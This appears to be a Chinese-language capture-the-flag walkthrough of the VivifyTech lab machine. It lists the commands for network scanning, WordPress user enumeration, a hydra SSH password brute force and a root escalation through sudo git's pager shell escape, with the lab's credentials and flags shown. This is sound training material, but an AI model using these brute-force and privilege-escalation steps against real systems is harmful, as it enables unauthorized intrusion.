kali:192.168.56.104
主机发现
arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:47:66:49 PCS Systemtechnik GmbH
192.168.56.111 08:00:27:87:6e:bd PCS Systemtechnik GmbH
靶机:192.168.56.111
端口扫描
nmap -p- 192.168.56.111
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
开启了 22 80 3306 33060端口
web界面没什么东西
扫描目录
gobuster dir -u http://192.168.56.111 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.111/wordpress/]
原来是wp服务
添上wordpress再扫一下
gobuster dir -u http://192.168.56.111/wordpress -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/license.txt (Status: 200) [Size: 19915]
/readme.html (Status: 200) [Size: 7399]
/wp-admin (Status: 301) [Size: 329] [--> http://192.168.56.111/wordpress/wp-admin/]
/wp-content (Status: 301) [Size: 331] [--> http://192.168.56.111/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 332] [--> http://192.168.56.111/wordpress/wp-includes/]
/wp-settings.php (Status: 500) [Size: 0]
/wp-blog-header.php (Status: 200) [Size: 0]
/wp-login.php (Status: 200) [Size: 5411]
/wp-load.php (Status: 200) [Size: 0]
/wp-links-opml.php (Status: 200) [Size: 225]
/wp-mail.php (Status: 403) [Size: 2616]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-cron.php (Status: 200) [Size: 0]
/wp-config.php (Status: 200) [Size: 0]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.111/wordpress/wp-login.php?action=register]
在wp-includes里面发现一个secret.txt可以作为一个密码字典
wpscan扫一下用户名
wpscan --url http://192.168.56.111/wordpress -e u
[i] User(s) Identified:[+] sancelisso
用户名sancelisso
但是一个用户名太少了,
再找点用户名
注意到wp里面除了helloworld还有一篇文章里面有几个人名
Sarah Mark Emily Jake Alex
添加到user.txt
wpscan没爆出来ssh也没爆出来
把名字首字母改成小写后爆了出来
# hydra -L user.txt -P secret.txt ssh://192.168.56.111
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:53:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 288 login tries (l:6/p:48), ~18 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[22][ssh] host: 192.168.56.111 login: sarah password: bohicon
ssh连接拿到user权限
sarah@VivifyTech:~$ whoami
sarah
sarah@VivifyTech:~$ ls -al
total 32
drwx------ 4 sarah sarah 4096 Mar 2 08:47 .
drwxr-xr-x 6 root root 4096 Dec 5 16:00 ..
-rw------- 1 sarah sarah 0 Dec 5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah 245 Dec 5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc
-rw------- 1 sarah sarah 0 Mar 2 08:47 .history
drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local
drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private
-rw-r--r-- 1 sarah sarah 807 Dec 5 15:57 .profile
-rw-r--r-- 1 sarah sarah 27 Dec 5 16:22 user.txt
sarah@VivifyTech:~$ cat user.txt
HMV{Y0u_G07_Th15_0ne_6543}
有个.private文件夹
sarah@VivifyTech:~/.private$ ls -al
total 12
drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .
drwx------ 4 sarah sarah 4096 Mar 2 09:03 ..
-rw-r--r-- 1 sarah sarah 274 Dec 5 16:19 Tasks.txt
sarah@VivifyTech:~/.private$ cat T*
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N
给了gbodja/4Tch055ouy370N
ssh连接
gbodja@VivifyTech:~$ whoami
gbodja
gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_ptyUser gbodja may run the following commands on VivifyTech:(ALL) NOPASSWD: /usr/bin/git
sudo -l发现可以git提权
直接
sudo /usr/bin/git help config
在底端输入!/bin/bash或者!sh或者!bash拿到root权限
gbodja@VivifyTech:/usr/bin$ sudo /usr/bin/git help config
root@VivifyTech:/usr/bin# whoami
root
root@VivifyTech:/usr/bin# cd /root
root@VivifyTech:~# ls -al
total 40
drwx------ 4 root root 4096 Dec 5 17:53 .
drwxr-xr-x 18 root root 4096 Dec 5 10:10 ..
-rw------- 1 root root 1297 Dec 5 17:55 .bash_history
-rw-r--r-- 1 root root 610 Dec 5 17:43 .bashrc
-rw------- 1 root root 36 Dec 5 17:53 .lesshst
drwxr-xr-x 3 root root 4096 Dec 5 11:05 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 40 Dec 5 17:07 root.txt
drwx------ 2 root root 4096 Dec 5 10:10 .ssh
-rw-r--r-- 1 root root 168 Dec 5 10:38 .wget-hsts
root@VivifyTech:~# cat root*
HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}